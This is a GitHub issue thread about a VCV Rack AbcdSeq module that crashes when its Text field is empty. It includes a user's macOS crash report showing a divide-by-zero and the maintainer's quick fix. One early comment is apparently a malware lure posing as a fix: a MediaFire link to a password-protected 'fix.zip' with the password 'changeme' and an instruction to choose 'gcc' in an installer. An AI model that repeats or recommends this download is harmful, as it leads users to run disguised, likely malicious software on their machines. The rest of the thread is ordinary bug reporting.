### ISSUE TITLE
AbcdSeq: Crashes on empty Text field

### ISSUE THREAD

**Issue by anaday** [jeremywen/JW-Modules#97]
Love the new module. Thanks for this.

Rack crashes if you edit (empty) the Text field while the the clock is running. Other than that, builds (I'm on Mac 10.15.7) and runs great!

**Comment by pngjian** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by jeremywen** [comment]
I need more info.  It doesn't happen for me.

**Comment by anaday** [comment]
Here's a video. If you leave the Text field blank too long, it crashes Rack.

https://imgur.com/a/xdtOyyL

Don't know if this helps.  Top half of report:
Process:               Rack [11574]
Path:                  /Applications/VCV Rack 2 Free.app/Contents/MacOS/Rack
Identifier:            com.vcvrack.rack
Version:               2.5.2 (2.5.2)
Code Type:             X86-64 (Native)
Parent Process:        ??? [1]
Responsible:           Rack [11574]
User ID:               501

Date/Time:             2024-08-26 14:23:30.803 -0400
OS Version:            Mac OS X 10.15.7 (19H15)
Report Version:        12
Anonymous UUID:        2E0A9677-83EB-5278-65AC-A0AA2840FE64

Sleep/Wake UUID:       7FEB7CA4-59A7-4854-AEF7-562CBC4AD7A3

Time Awake Since Boot: 460000 seconds
Time Since Wake:       1600 seconds

System Integrity Protection: disabled

Crashed Thread:        9  com.apple.audio.IOThread.client

Exception Type:        EXC_ARITHMETIC (SIGFPE)
Exception Codes:       EXC_I386_DIV (divide by zero)
Exception Note:        EXC_CORPSE_NOTIFY

Thread 0:
0   libsystem_kernel.dylib        	0x00007fff6bbc8756 __semwait_signal + 10
1   libc++.1.dylib                	0x00007fff68d966da std::__1::this_thread::sleep_for(std::__1::chrono::duration<long long, std::__1::ratio<1l, 1000000000l> > const&) + 73
2   libRack.dylib                 	0x000000010a72df7c rack::system::sleep(double) + 92
3   libRack.dylib                 	0x000000010a7d91a3 rack::window::Window::step() + 2019
4   libRack.dylib                 	0x000000010a7d89a8 rack::window::Window::run() + 40
5   com.vcvrack.rack              	0x000000010a66a74b main + 4443
6   libdyld.dylib                 	0x00007fff6ba84cc9 start + 1

Thread 1:: AMCP Logging Spool
0   libsystem_kernel.dylib        	0x00007fff6bbc5e36 semaphore_wait_trap + 10
1   com.apple.audio.caulk         	0x00007fff655cab16 caulk::mach::semaphore::wait() + 16
2   com.apple.audio.caulk         	0x00007fff655ca9b2 caulk::semaphore::timed_wait(double) + 106
3   com.apple.audio.caulk         	0x00007fff655ca7c4 caulk::concurrent::details::worker_thread::run() + 30
4   com.apple.audio.caulk         	0x00007fff655ca1e4 void* caulk::thread_proxy<std::__1::tuple<caulk::thread::attributes, void (caulk::concurrent::details::worker_thread::*)(), std::__1::tuple<caulk::concurrent::details::worker_thread*> > >(void*) + 45
5   libsystem_pthread.dylib       	0x00007fff6bc8d109 _pthread_start + 148
6   libsystem_pthread.dylib       	0x00007fff6bc88b8b thread_start + 15

Thread 2:
0   libsystem_kernel.dylib        	0x00007fff6bbc5e36 semaphore_wait_trap + 10
1   com.apple.audio.caulk         	0x00007fff655cab16 caulk::mach::semaphore::wait() + 16
2   com.apple.audio.caulk         	0x00007fff655ca9b2 caulk::semaphore::timed_wait(double) + 106
3   com.apple.audio.caulk         	0x00007fff655ca7c4 caulk::concurrent::details::worker_thread::run() + 30
4   com.apple.audio.caulk         	0x00007fff655ca1e4 void* caulk::thread_proxy<std::__1::tuple<caulk::thread::attributes, void (caulk::concurrent::details::worker_thread::*)(), std::__1::tuple<caulk::concurrent::details::worker_thread*> > >(void*) + 45
5   libsystem_pthread.dylib       	0x00007fff6bc8d109 _pthread_start + 148
6   libsystem_pthread.dylib       	0x00007fff6bc88b8b thread_start + 15

Thread 3:
0   libsystem_pthread.dylib       	0x00007fff6bc88b68 start_wqthread + 0

Thread 4:
0   libsystem_kernel.dylib        	0x00007fff6bbc5dfa mach_msg_trap + 10
1   libsystem_kernel.dylib        	0x00007fff6bbc6170 mach_msg + 60
2   com.apple.audio.midi.CoreMIDI 	0x00007fff327dc635 XServerMachPort::ReceiveMessage(int&, void*, int&) + 95
3   com.apple.audio.midi.CoreMIDI 	0x00007fff327f9fee MIDIProcess::RunMIDIInThread() + 104
4   com.apple.audio.midi.CoreMIDI 	0x00007fff327f8d5e XThread::RunHelper(void*) + 10
5   com.apple.audio.midi.CoreMIDI 	0x00007fff327dc331 CAPThread::Entry(CAPThread*) + 77
6   libsystem_pthread.dylib       	0x00007fff6bc8d109 _pthread_start + 148
7   libsystem_pthread.dylib       	0x00007fff6bc88b8b thread_start + 15

Thread 5:
0   libsystem_pthread.dylib       	0x00007fff6bc88b68 start_wqthread + 0

Thread 6:
0   libsystem_pthread.dylib       	0x00007fff6bc88b68 start_wqthread + 0

Thread 7:: com.apple.NSEventThread
0   libsystem_kernel.dylib        	0x00007fff6bbc5dfa mach_msg_trap + 10
1   libsystem_kernel.dylib        	0x00007fff6bbc6170 mach_msg + 60
2   com.apple.CoreFoundation      	0x00007fff31962a27 __CFRunLoopServiceMachPort + 247
3   com.apple.CoreFoundation      	0x00007fff319614e1 __CFRunLoopRun + 1329
4   com.apple.CoreFoundation      	0x00007fff31960953 CFRunLoopRunSpecific + 466
5   com.apple.AppKit              	0x00007fff2ed62954 _NSEventThread + 132
6   libsystem_pthread.dylib       	0x00007fff6bc8d109 _pthread_start + 148
7   libsystem_pthread.dylib       	0x00007fff6bc88b8b thread_start + 15

Thread 8:
0   libsystem_pthread.dylib       	0x00007fff6bc88b68 start_wqthread + 0

Thread 9 Crashed:: com.apple.audio.IOThread.client
0   plugin.dylib                  	0x0000000119fd02d7 AbcdSeq::moveToNextStep() + 311
1   plugin.dylib                  	0x0000000119fcfb71 AbcdSeq::process(rack::engine::Module::ProcessArgs const&) + 1089
2   libRack.dylib                 	0x000000010a7c33b4 rack::engine::Module::doProcess(rack::engine::Module::ProcessArgs const&) + 116
3   libRack.dylib                 	0x000000010a7bc634 rack::engine::Engine::stepBlock(int) + 708
4   libRack.dylib                 	0x000000010a6dbf6e rack::audio::Device::processBuffer(float const*, int, float*, int, int) + 286
5   libRack.dylib                 	0x000000010a7194db rack::RtAudioDevice::rtAudioCallback(void*, void*, unsigned int, double, unsigned int, void*) + 123
6   libRack.dylib                 	0x000000010ac0422c RtApiCore::callbackEvent(unsigned int, AudioBufferList const*, AudioBufferList const*) + 348
7   libRack.dylib                 	0x000000010ac03285 callbackHandler(unsigned int, AudioTimeStamp const*, AudioBufferList const*, AudioTimeStamp const*, AudioBufferList*, AudioTimeStamp const*, void*) + 21
8   com.apple.audio.CoreAudio     	0x00007fff30f2faaa invocation function for block in HALC_ProxyIOContext::HALC_ProxyIOContext(unsigned int, unsigned int) + 5639
9   com.apple.audio.CoreAudio     	0x00007fff31062c22 HALB_IOThread::Entry(void*) + 72
10  libsystem_pthread.dylib       	0x00007fff6bc8d109 _pthread_start + 148
11  libsystem_pthread.dylib       	0x00007fff6bc88b8b thread_start + 15

Thread 10:
0   libsystem_kernel.dylib        	0x00007fff6bbc8882 __psynch_cvwait + 10
1   libc++.1.dylib                	0x00007fff68d5f592 std::__1::condition_variable::wait(std::__1::unique_lock<std::__1::mutex>&) + 18
2   libRack.dylib                 	0x000000010a7c0152 rack::engine::Engine_fallbackRun(rack::engine::Engine*) + 226
3   libRack.dylib                 	0x000000010a7c1a50 void* std::__1::__thread_proxy[abi:ue170006]<std::__1::tuple<std::__1::unique_ptr<std::__1::__thread_struct, std::__1::default_delete<std::__1::__thread_struct> >, void (*)(rack::engine::Engine*), rack::engine::Engine*> >(void*) + 48
4   libsystem_pthread.dylib       	0x00007fff6bc8d109 _pthread_start + 148
5   libsystem_pthread.dylib       	0x00007fff6bc88b8b thread_start + 15

Thread 9 crashed with X86 Thread State (64-bit):
  rax: 0x0000000000000002  rbx: 0x00007fd8b589fe00  rcx: 0x00007fd8b58a0100  rdx: 0x0000000000000000
  rdi: 0x00007fd8b589fe00  rsi: 0x0000000000000000  rbp: 0x0000700008e0aaa0  rsp: 0x0000700008e0aa80
   r8: 0x00006000020c4780   r9: 0x00007fd8ba1d3000  r10: 0x0000000000000000  r11: 0x00006000035f0e80
  r12: 0x0000000000000007  r13: 0x0000700008e0ab30  r14: 0x0000000000000004  r15: 0x00007fd8b58a01a0
  rip: 0x0000000119fd02d7  rfl: 0x0000000000000246  cr2: 0x00007fff91bebff0
  
Logical CPU:     0
Error Code:      0x020000b8
Trap Number:     133

**Comment by jeremywen** [comment]
I fixed something based on your report.  Can you try again?

**Comment by anaday** [comment]
Yep. That did it. You're fast! Thanks.
